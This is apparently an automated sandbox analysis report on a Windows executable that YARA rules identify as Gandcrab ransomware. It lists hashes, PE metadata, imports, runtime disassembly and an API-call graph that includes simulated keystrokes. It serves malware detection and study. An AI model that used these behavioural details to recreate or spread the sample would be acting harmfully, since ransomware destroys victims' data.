                    SSDEEP:3072:l5K/B0toL6SNJmlZHQsozTS+SMqqDL2/TrKdcG:lcytw/u1yTS+xqqDL6HKL
                    TLSH:EAF38C1971D1A0B2E4F30976D5B8AF12446DFC111BB07CDB72E61A9E19320E3AE39B53
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..{...(...(...(...(...(..?(...(T.?(...(T..(...(T.>(w..(..M(...(...(...(..:(...(...(...(Rich...(........................PE..L..

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x401612
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x5AF0C742 [Mon May 7 21:38:10 2018 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:7848011b763d00cd02658995847dd30b

                    Entrypoint Preview

                    Instruction
                    call 00007F3424C7490Fh
                    jmp 00007F3424C73520h
                    cmp ecx, dword ptr [00413050h]
                    jne 00007F3424C736A4h
                    rep ret
                    jmp 00007F3424C74C9Bh
                    int3
                    int3
                    int3
                    int3
                    int3
                    mov ecx, dword ptr [esp+08h]
                    mov eax, dword ptr [esp+04h]
                    push edi
                    push ebx
                    push esi
                    cmp dword ptr [00427E00h], 01h
                    jc 00007F3424C73874h
                    ja 00007F3424C737A3h
                    movzx edx, byte ptr [ecx]
                    mov ebx, edx
                    shl edx, 08h
                    or edx, ebx
                    je 00007F3424C7378Fh
                    movd xmm3, edx
                    pshuflw xmm3, xmm3, 00h
                    movlhps xmm3, xmm3
                    pxor xmm0, xmm0
                    mov esi, ecx
                    or edi, FFFFFFFFh
                    movzx ebx, byte ptr [ecx]
                    add ecx, 01h
                    test ebx, ebx
                    je 00007F3424C736BFh
                    test ecx, 0000000Fh
                    jne 00007F3424C73690h
                    movdqa xmm2, dqword ptr [ecx]
                    pcmpeqb xmm2, xmm0
                    pmovmskb ebx, xmm2
                    test ebx, ebx
                    jne 00007F3424C736A7h
                    mov edi, 0000000Fh
                    movd edx, xmm3
                    mov ebx, 00000FFFh
                    and ebx, eax
                    cmp ebx, 00000FF0h
                    jnbe 00007F3424C736C9h
                    movdqu xmm1, dqword ptr [eax]
                    pxor xmm2, xmm2
                    pcmpeqb xmm2, xmm1
                    pcmpeqb xmm1, xmm3
                    por xmm1, xmm2
                    pmovmskb ebx, xmm1
                    add eax, 10h
                    test ebx, ebx
                    je 00007F3424C73674h
                    bsf ebx, ebx
                    sub eax, 10h
                    add eax, ebx
                    movzx ebx, byte ptr [eax]
                    test ebx, ebx

                    Rich Headers

                    Programming Language:
                    • [C++] VS2013 build 21005
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2013 build 21005

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x121640x50.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000x1120.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11df80x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0xe0000x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000xc9c70xca00False0.5717435024752475data6.680188843446378IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0xe0000x49d40x4a00False0.4021853885135135data4.712898301860252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x130000x161c40x14400False0.47274064429012347data6.3863967246134115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x2a0000x11200x1200False0.7840711805555556data6.544131886571421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Imports

                    DLLImport
                    KERNEL32.dllGetCurrentProcess, WaitForSingleObject, OpenProcess, Sleep, GetModuleFileNameW, CreateFileW, ExitThread, GetLastError, GetProcAddress, ExitProcess, GetModuleHandleA, CloseHandle, GetCurrentProcessId, GetVersionExW, LoadLibraryA, lstrlenW, TerminateThread, CreateThread, WriteConsoleW, SetFilePointerEx, VirtualProtect, IsWow64Process, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetCommandLineA, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsDebuggerPresent, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, EnterCriticalSection, LeaveCriticalSection, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, LoadLibraryExW, OutputDebugStringW, HeapAlloc, HeapReAlloc, GetStringTypeW, HeapSize, LCMapStringW
                    USER32.dllSetFocus, SendMessageW, CharUpperBuffW, GetForegroundWindow, GetSystemMetrics, GetMessageW, TranslateMessage, DispatchMessageW, SetForegroundWindow, DefWindowProcW, RegisterClassExW, CreateWindowExW, DestroyWindow, ShowWindow, keybd_event, UpdateWindow, SetWindowTextW, GetWindowLongW, SetWindowLongW, SystemParametersInfoW, GetAncestor
                    ntdll.dllRtlUnwind

                    Network Behavior

                    No network behavior found

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:23:59:22
                    Start date:31/08/2022
                    Path:C:\Users\user\Desktop\vy3mvlAaCZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\vy3mvlAaCZ.exe"
                    Imagebase:0x930000
                    File size:159232 bytes
                    MD5 hash:1873A210D41ACDEF243E921F3810803A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Target ID:3
                    Start time:23:59:24
                    Start date:31/08/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244
                    Imagebase:0x970000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:0.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.6%
                      Total number of Nodes:1815
                      Total number of Limit Nodes:10
                      execution_graph 6892 931893 6893 9318c8 6892->6893 6894 9318a3 6892->6894 6894->6893 6899 932fcb 6894->6899 6900 932fd7 __initptd 6899->6900 6901 931b72 __setmbcp 58 API calls 6900->6901 6904 932fdc 6901->6904 6905 935008 6904->6905 6916 934630 DecodePointer 6905->6916 6907 93500d 6908 935018 6907->6908 6917 934659 6907->6917 6910 935022 IsProcessorFeaturePresent 6908->6910 6915 935040 6908->6915 6912 93502d 6910->6912 6911 931e47 _raise 58 API calls 6913 93504a 6911->6913 6914 934130 __call_reportfault 7 API calls 6912->6914 6914->6915 6915->6911 6916->6907 6920 934665 __initptd 6917->6920 6918 9346cf 6919 9346ac DecodePointer 6918->6919 6924 9346de 6918->6924 6927 93469b _siglookup 6919->6927 6920->6918 6920->6919 6921 934696 6920->6921 6926 934692 6920->6926 6923 931b8a __getptd_noexit 58 API calls 6921->6923 6923->6927 6925 9342fc __cftoe2_l 58 API calls 6924->6925 6929 9346e3 6925->6929 6926->6921 6926->6924 6928 93473c 6927->6928 6930 931e47 _raise 58 API calls 6927->6930 6937 9346a4 __initptd 6927->6937 6932 9333ce __lock 58 API calls 6928->6932 6935 934747 6928->6935 6931 93428d __cftoe2_l 9 API calls 6929->6931 6930->6928 6931->6937 6932->6935 6933 9347a9 EncodePointer 6934 93477c 6933->6934 6938 9347da 6934->6938 6935->6933 6935->6934 6937->6908 6939 9347e5 6938->6939 6940 9347de 6938->6940 6939->6937 6942 933538 LeaveCriticalSection 6940->6942 6942->6939 6943 931612 6946 932881 6943->6946 6945 931617 6945->6945 6947 9328b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6946->6947 6948 9328a4 6946->6948 6949 9328a8 6947->6949 6948->6947 6948->6949 6949->6945 6950 934491 6951 933585 __calloc_crt 58 API calls 6950->6951 6952 93449b EncodePointer 6951->6952 6953 9344b4 6952->6953 7777 935b51 7778 931d89 __lock 58 API calls 7777->7778 7779 935b58 7778->7779 6954 93c090 6955 93c0b0 6954->6955 6956 93c4c6 6954->6956 6955->6956 6958 93c0bd RegisterClassExW 6955->6958 6957 93161c __setmbcp_nolock 6 API calls 6956->6957 6960 93c4d2 6957->6960 6959 93c141 6958->6959 6964 93c152 _memset 6958->6964 6961 93161c __setmbcp_nolock 6 API calls 6959->6961 6962 93c14e 6961->6962 6963 93c170 CreateWindowExW 6963->6964 6966 93c1ae 6963->6966 6964->6963 6964->6966 6965 93c750 LoadLibraryA GetProcAddress 6965->6966 6966->6965 6967 93c298 6966->6967 6968 93c2b7 DestroyWindow 6967->6968 6969 93c2c3 6967->6969 6968->6967 6970 93c4b3 6969->6970 6977 93c2dd 6969->6977 6971 93161c __setmbcp_nolock 6 API calls 6970->6971 6973 93c4c2 6971->6973 6972 93c384 6974 93161c __setmbcp_nolock 6 API calls 6972->6974 6975 93c396 6974->6975 6976 93c328 CreateThread 6976->6977 6977->6972 6977->6976 6978 93c349 Sleep 6977->6978 6979 93c353 DestroyWindow DestroyWindow TerminateThread 6977->6979 6980 93c39f CreateWindowExW 6977->6980 6984 93b6e0 6977->6984 6978->6977 6978->6979 6979->6977 6981 93c453 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 6980->6981 6982 93c3e2 8 API calls 6980->6982 6981->6977 6982->6981 7006 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6984->7006 6986 93b6fa 7007 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6986->7007 6988 93b702 7008 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6988->7008 6990 93b708 6991 93b71c GetCurrentProcessId 6990->6991 6992 93b72c 6 API calls 6990->6992 6991->6992 6992->6990 6993 93b81f 6992->6993 7009 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6993->7009 6995 93b831 6996 93b834 6 API calls 6995->6996 6996->6996 6997 93b922 6996->6997 7010 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6997->7010 6999 93b92f 7011 93bee0 SetWindowLongW GetAncestor SetWindowLongW 6999->7011 7001 93b93f 7012 93c4e0 7001->7012 7003 93b951 7004 93c4e0 19 API calls 7003->7004 7005 93b95a 7004->7005 7005->6977 7006->6986 7007->6988 7008->6990 7009->6995 7010->6999 7011->7001 7030 935a90 7012->7030 7015 93c567 lstrlenW 7017 93c575 7015->7017 7016 93c556 7016->7015 7018 93c5a1 SetWindowLongW GetAncestor SetWindowLongW lstrlenW 7017->7018 7019 93c653 7017->7019 7018->7017 7018->7019 7020 93c65b 7019->7020 7021 93c66e SetWindowLongW SetWindowTextW 7019->7021 7022 93161c __setmbcp_nolock 6 API calls 7020->7022 7023 93c6b4 SetWindowTextW 7021->7023 7024 93c6cd 7021->7024 7025 93c66a 7022->7025 7023->7024 7026 93c6f1 SetWindowLongW ShowWindow UpdateWindow 7024->7026 7027 93c6d8 SetWindowTextW 7024->7027 7025->7003 7028 93161c __setmbcp_nolock 6 API calls 7026->7028 7027->7026 7029 93c740 7028->7029 7029->7003 7031 935a9c lstrlenW 7030->7031 7031->7015 7031->7016 7032 93d110 CreateWindowExW 7033 93d188 7032->7033 7051 93d70e 7032->7051 7034 93c750 2 API calls 7033->7034 7036 93d18e 7034->7036 7035 93161c __setmbcp_nolock 6 API calls 7037 93d736 7035->7037 7038 93d715 DestroyWindow 7036->7038 7039 93d19e 7036->7039 7038->7051 7040 93d1ab GetWindowLongW SetWindowLongW 7039->7040 7042 93d1c5 7039->7042 7040->7042 7041 93d271 DestroyWindow 7043 93d280 7041->7043 7041->7051 7042->7041 7044 93d29a RegisterClassExW 7043->7044 7043->7051 7045 93d321 _memset 7044->7045 7044->7051 7046 93d340 CreateWindowExW 7045->7046 7049 93d37e 7045->7049 7046->7045 7046->7049 7047 93d4d7 7050 93d4fd DestroyWindow 7047->7050 7059 93d509 7047->7059 7048 93c750 LoadLibraryA GetProcAddress 7048->7049 7049->7047 7049->7048 7050->7047 7051->7035 7052 93d57c CreateThread 7052->7059 7053 93d59c Sleep 7053->7059 7054 93d5af CreateWindowExW 7056 93d5f6 GetWindowLongW SetWindowLongW 7054->7056 7057 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7054->7057 7055 93d6dd DestroyWindow DestroyWindow TerminateThread 7055->7059 7058 9310c5 7056->7058 7057->7059 7060 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7058->7060 7059->7051 7059->7052 7059->7053 7059->7054 7059->7055 7062 93c820 7059->7062 7060->7057 7084 93cea0 7062->7084 7064 93c846 7065 93cea0 2 API calls 7064->7065 7066 93c851 7065->7066 7067 93cea0 2 API calls 7066->7067 7068 93c858 7067->7068 7069 93c869 GetCurrentProcessId 7068->7069 7070 93cea0 GetAncestor GetAncestor 7068->7070 7071 93c8b3 7068->7071 7069->7068 7070->7068 7072 93cea0 2 API calls 7071->7072 7074 93c8cc 7072->7074 7073 93cea0 GetAncestor GetAncestor 7073->7074 7074->7073 7075 93c90a 7074->7075 7076 93cea0 2 API calls 7075->7076 7077 93c91e 7076->7077 7078 93cea0 2 API calls 7077->7078 7079 93c937 7078->7079 7090 93d740 7079->7090 7081 93c946 7082 93d740 14 API calls 7081->7082 7083 93c955 7082->7083 7083->7059 7085 9310c5 7084->7085 7086 93cf07 GetAncestor 7085->7086 7087 9310c5 7086->7087 7088 93cf66 GetAncestor 7087->7088 7089 93cfb7 7088->7089 7089->7064 7091 935a90 _memset 7090->7091 7092 93d79b lstrlenW 7091->7092 7093 93d7da lstrlenW 7092->7093 7094 93d7c9 7092->7094 7095 93d7e8 7093->7095 7094->7093 7096 93cea0 2 API calls 7095->7096 7098 93d847 7095->7098 7097 93d816 lstrlenW 7096->7097 7097->7095 7097->7098 7099 93d85f 7098->7099 7100 93d84c 7098->7100 7103 93d8a3 SetWindowTextW 7099->7103 7101 93161c __setmbcp_nolock 6 API calls 7100->7101 7102 93d85b 7101->7102 7102->7081 7104 93d8c3 SetWindowTextW 7103->7104 7105 93d8dc 7103->7105 7104->7105 7106 93d900 7105->7106 7107 93d8e7 SetWindowTextW 7105->7107 7108 93161c __setmbcp_nolock 6 API calls 7106->7108 7107->7106 7109 93d95c 7108->7109 7109->7081 7780 932a50 7781 932a87 7780->7781 7782 932a7a 7780->7782 7784 93161c __setmbcp_nolock 6 API calls 7781->7784 7783 93161c __setmbcp_nolock 6 API calls 7782->7783 7783->7781 7786 932a97 __except_handler4 7784->7786 7785 932baf 7786->7785 7787 932b64 __except_handler4 7786->7787 7792 932aee __IsNonwritableInCurrentImage 7786->7792 7787->7785 7788 932b9f 7787->7788 7790 93161c __setmbcp_nolock 6 API calls 7787->7790 7789 93161c __setmbcp_nolock 6 API calls 7788->7789 7789->7785 7790->7788 7798 934982 RtlUnwind 7792->7798 7793 932bc6 7795 93161c __setmbcp_nolock 6 API calls 7793->7795 7794 932b2c __except_handler4 7794->7793 7796 93161c __setmbcp_nolock 6 API calls 7794->7796 7797 932bd6 __except_handler4 7795->7797 7796->7793 7798->7794 5791 931497 5792 9314a3 __initptd 5791->5792 5827 932041 GetProcessHeap 5792->5827 5794 9314f8 5795 931503 5794->5795 5868 9315eb 5794->5868 5828 931cac 5795->5828 5798 931509 5799 931514 __RTC_Initialize 5798->5799 5800 9315eb _fast_error_exit 58 API calls 5798->5800 5849 932056 5799->5849 5800->5799 5802 931523 5803 931527 5802->5803 5804 93152f GetCommandLineA 5802->5804 5806 9315eb _fast_error_exit 58 API calls 5803->5806 5876 93295d GetEnvironmentStringsW 5804->5876 5808 93152e 5806->5808 5808->5804 5810 931554 5907 932539 5810->5907 5815 931565 5923 931dc3 5815->5923 5816 931d89 __lock 58 API calls 5816->5815 5818 93156d 5819 931578 5818->5819 5820 931d89 __lock 58 API calls 5818->5820 5929 9313f5 5819->5929 5820->5819 5827->5794 5938 931e5b RtlEncodePointer 5828->5938 5830 931cb1 5944 9334ff 5830->5944 5833 931cba 5948 931d22 5833->5948 5838 931cd7 5960 933585 5838->5960 5841 931d19 5843 931d22 __mtterm 61 API calls 5841->5843 5845 931d1e 5843->5845 5844 931cf8 5844->5841 5846 931cfe 5844->5846 5845->5798 5968 931bf9 5846->5968 5848 931d06 GetCurrentThreadId 5848->5798 5850 932062 __initptd 5849->5850 5851 9333ce __lock 58 API calls 5850->5851 5852 932069 5851->5852 5853 933585 __calloc_crt 58 API calls 5852->5853 5854 93207a 5853->5854 5855 932085 __initptd @_EH4_CallFilterFunc@8 5854->5855 5856 9320e5 GetStartupInfoW 5854->5856 5855->5802 5862 9320fa 5856->5862 5863 932229 5856->5863 5857 9322f1 6228 932301 5857->6228 5859 933585 __calloc_crt 58 API calls 5859->5862 5860 932276 GetStdHandle 5860->5863 5861 932289 GetFileType 5861->5863 5862->5859 5862->5863 5864 932148 5862->5864 5863->5857 5863->5860 5863->5861 5867 93308e ___lock_fhandle InitializeCriticalSectionAndSpinCount 5863->5867 5864->5863 5865 93217c GetFileType 5864->5865 5866 93308e ___lock_fhandle InitializeCriticalSectionAndSpinCount 5864->5866 5865->5864 5866->5864 5867->5863 5869 9315f7 5868->5869 5870 9315fc 5868->5870 5871 93261a __FF_MSGBANNER 58 API calls 5869->5871 5872 932677 __NMSG_WRITE 58 API calls 5870->5872 5871->5870 5873 931604 5872->5873 5874 931d73 _doexit 3 API calls 5873->5874 5875 93160e 5874->5875 5875->5795 5877 932970 WideCharToMultiByte 5876->5877 5878 93153f 5876->5878 5880 9329a3 5877->5880 5881 9329da FreeEnvironmentStringsW 5877->5881 5889 93230a 5878->5889 5882 9335cd __malloc_crt 58 API calls 5880->5882 5881->5878 5883 9329a9 5882->5883 5883->5881 5884 9329b0 WideCharToMultiByte 5883->5884 5885 9329c6 5884->5885 5886 9329cf FreeEnvironmentStringsW 5884->5886 5887 93354d _free 58 API calls 5885->5887 5886->5878 5888 9329cc 5887->5888 5888->5886 5890 932318 5889->5890 5891 93231d GetModuleFileNameA 5889->5891 6232 9339b8 5890->6232 5893 93234a 5891->5893 6236 9323bd 5893->6236 5895 931549 5895->5810 5900 931d89 5895->5900 5897 9335cd __malloc_crt 58 API calls 5898 932383 5897->5898 5898->5895 5899 9323bd _parse_cmdline 58 API calls 5898->5899 5899->5895 5901 93261a __FF_MSGBANNER 58 API calls 5900->5901 5902 931d91 5901->5902 5903 932677 __NMSG_WRITE 58 API calls 5902->5903 5904 931d99 5903->5904 6658 931e47 5904->6658 5908 932542 5907->5908 5910 932547 _strlen 5907->5910 5909 9339b8 ___initmbctable 70 API calls 5908->5909 5909->5910 5911 933585 __calloc_crt 58 API calls 5910->5911 5914 93155a 5910->5914 5919 93257d _strlen 5911->5919 5912 9325cf 5913 93354d _free 58 API calls 5912->5913 5913->5914 5914->5815 5914->5816 5915 933585 __calloc_crt 58 API calls 5915->5919 5916 9325f6 5918 93354d _free 58 API calls 5916->5918 5918->5914 5919->5912 5919->5914 5919->5915 5919->5916 5920 93260d 5919->5920 6688 934b92 5919->6688 5921 93429d __invoke_watson 8 API calls 5920->5921 5922 932619 5921->5922 5924 931dcf __IsNonwritableInCurrentImage 5923->5924 6697 9345d1 5924->6697 5926 931ded __initterm_e 5928 931e0c __cinit __IsNonwritableInCurrentImage 5926->5928 6700 9345bc 5926->6700 5928->5818 6766 93132f GetModuleFileNameW GetModuleFileNameW 5929->6766 5932 931466 6779 931243 5932->6779 5933 93145f ExitProcess 5978 934616 5938->5978 5940 931e6c __init_pointers __initp_misc_winsig 5979 932fff EncodePointer 5940->5979 5942 931e84 __init_pointers 5943 9330fc 34 API calls 5942->5943 5943->5830 5945 93350b 5944->5945 5947 931cb6 5945->5947 5980 93308e 5945->5980 5947->5833 5957 933010 5947->5957 5949 931d2c 5948->5949 5951 931d32 5948->5951 5983 93302e 5949->5983 5952 933418 DeleteCriticalSection 5951->5952 5953 933434 5951->5953 5986 93354d 5952->5986 5955 931cbf 5953->5955 5956 933440 DeleteCriticalSection 5953->5956 5955->5798 5956->5953 5958 933027 TlsAlloc 5957->5958 5959 931ccc 5957->5959 5959->5833 5959->5838 5964 93358c 5960->5964 5962 931ce4 5962->5841 5965 93306c 5962->5965 5964->5962 6012 935188 5964->6012 6020 933395 Sleep 5964->6020 5966 933086 TlsSetValue 5965->5966 5967 933082 5965->5967 5966->5844 5967->5844 5969 931c05 __initptd 5968->5969 6023 9333ce 5969->6023 5971 931c42 6030 931c9a 5971->6030 5974 9333ce __lock 58 API calls 5975 931c63 ___addlocaleref 5974->5975 6033 931ca3 5975->6033 5977 931c8e __initptd 5977->5848 5978->5940 5979->5942 5981 9330ab InitializeCriticalSectionAndSpinCount 5980->5981 5982 93309e 5980->5982 5981->5945 5982->5945 5984 933041 5983->5984 5985 933045 TlsFree 5983->5985 5984->5951 5985->5951 5987 93357f __dosmaperr 5986->5987 5988 933556 HeapFree 5986->5988 5987->5951 5988->5987 5989 93356b 5988->5989 5992 9342fc 5989->5992 5995 931b8a GetLastError 5992->5995 5994 933571 GetLastError 5994->5987 6009 93304d 5995->6009 5997 931b9f 5998 931bed SetLastError 5997->5998 5999 933585 __calloc_crt 55 API calls 5997->5999 5998->5994 6000 931bb2 5999->6000 6000->5998 6001 93306c __getptd_noexit TlsSetValue 6000->6001 6002 931bc6 6001->6002 6003 931be4 6002->6003 6004 931bcc 6002->6004 6006 93354d _free 55 API calls 6003->6006 6005 931bf9 __initptd 55 API calls 6004->6005 6007 931bd4 GetCurrentThreadId 6005->6007 6008 931bea 6006->6008 6007->5998 6008->5998 6010 933064 TlsGetValue 6009->6010 6011 933060 6009->6011 6010->5997 6011->5997 6013 935193 6012->6013 6017 9351ae 6012->6017 6014 93519f 6013->6014 6013->6017 6015 9342fc __cftoe2_l 57 API calls 6014->6015 6018 9351a4 6015->6018 6016 9351be HeapAlloc 6016->6017 6016->6018 6017->6016 6017->6018 6021 9345f0 DecodePointer 6017->6021 6018->5964 6020->5964 6022 934603 6021->6022 6022->6017 6024 9333f2 KiUserExceptionDispatcher 6023->6024 6025 9333df 6023->6025 6024->5971 6036 933456 6025->6036 6027 9333e5 6027->6024 6028 931d89 __lock 57 API calls 6027->6028 6029 9333f1 6028->6029 6029->6024 6226 933538 LeaveCriticalSection 6030->6226 6032 931c5c 6032->5974 6227 933538 LeaveCriticalSection 6033->6227 6035 931caa 6035->5977 6037 933462 __initptd 6036->6037 6051 933481 6037->6051 6058 93261a 6037->6058 6040 9334a4 __initptd 6040->6027 6044 93349f 6047 9342fc __cftoe2_l 58 API calls 6044->6047 6045 9334ae 6048 9333ce __lock 58 API calls 6045->6048 6047->6040 6050 9334b5 6048->6050 6052 9334c2 6050->6052 6053 9334da 6050->6053 6051->6040 6100 9335cd 6051->6100 6054 93308e ___lock_fhandle InitializeCriticalSectionAndSpinCount 6052->6054 6055 93354d _free 58 API calls 6053->6055 6056 9334ce 6054->6056 6055->6056 6105 9334f6 6056->6105 6108 932841 6058->6108 6060 932621 6061 932841 __FF_MSGBANNER 58 API calls 6060->6061 6063 93262e 6060->6063 6061->6063 6062 932677 __NMSG_WRITE 58 API calls 6064 932646 6062->6064 6063->6062 6065 932650 6063->6065 6066 932677 __NMSG_WRITE 58 API calls 6064->6066 6067 932677 6065->6067 6066->6065 6068 932695 __NMSG_WRITE 6067->6068 6069 932841 __FF_MSGBANNER 55 API calls 6068->6069 6096 9327bc 6068->6096 6071 9326a8 6069->6071 6073 9327c1 GetStdHandle 6071->6073 6075 932841 __FF_MSGBANNER 55 API calls 6071->6075 6072 932825 6097 931d73 6072->6097 6074 9327cf _strlen 6073->6074 6073->6096 6079 932808 WriteFile 6074->6079 6074->6096 6076 9326b9 6075->6076 6076->6073 6077 9326cb 6076->6077 6077->6096 6138 934ce7 6077->6138 6079->6096 6081 932829 6083 93429d __invoke_watson 8 API calls 6081->6083 6082 9326f8 GetModuleFileNameW 6084 932718 6082->6084 6087 932728 __NMSG_WRITE 6082->6087 6086 932833 6083->6086 6085 934ce7 __NMSG_WRITE 55 API calls 6084->6085 6085->6087 6087->6081 6088 93276e 6087->6088 6147 934d5c 6087->6147 6088->6081 6156 934c7b 6088->6156 6092 934c7b __NMSG_WRITE 55 API calls 6093 9327a5 6092->6093 6093->6081 6094 9327ac 6093->6094 6165 934e1a EncodePointer 6094->6165 6190 93161c 6096->6190 6205 931d3f GetModuleHandleExW 6097->6205 6102 9335db 6100->6102 6103 933498 6102->6103 6208 93504b 6102->6208 6224 933395 Sleep 6102->6224 6103->6044 6103->6045 6225 933538 LeaveCriticalSection 6105->6225 6107 9334fd 6107->6040 6109 93284b 6108->6109 6110 932855 6109->6110 6111 9342fc __cftoe2_l 58 API calls 6109->6111 6110->6060 6112 932871 6111->6112 6115 93428d 6112->6115 6118 934262 DecodePointer 6115->6118 6119 934275 6118->6119 6124 93429d IsProcessorFeaturePresent 6119->6124 6122 934262 __cftoe2_l 8 API calls 6123 93287c 6122->6123 6123->6060 6125 9342a8 6124->6125 6130 934130 6125->6130 6129 93428c 6129->6122 6131 93414a ___raise_securityfailure _memset 6130->6131 6132 93416a IsDebuggerPresent 6131->6132 6133 9333b8 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6132->6133 6135 93422e ___raise_securityfailure 6133->6135 6134 93161c __setmbcp_nolock 6 API calls 6136 934251 6134->6136 6135->6134 6137 9333a3 GetCurrentProcess TerminateProcess 6136->6137 6137->6129 6139 934cf2 6138->6139 6140 934d00 6138->6140 6139->6140 6145 934d19 6139->6145 6141 9342fc __cftoe2_l 58 API calls 6140->6141 6142 934d0a 6141->6142 6143 93428d __cftoe2_l 9 API calls 6142->6143 6144 9326eb 6143->6144 6144->6081 6144->6082 6145->6144 6146 9342fc __cftoe2_l 58 API calls 6145->6146 6146->6142 6151 934d6a 6147->6151 6148 934d6e 6149 934d73 6148->6149 6150 9342fc __cftoe2_l 58 API calls 6148->6150 6149->6088 6152 934d9e 6150->6152 6151->6148 6151->6149 6154 934dad 6151->6154 6153 93428d __cftoe2_l 9 API calls 6152->6153 6153->6149 6154->6149 6155 9342fc __cftoe2_l 58 API calls 6154->6155 6155->6152 6157 934c95 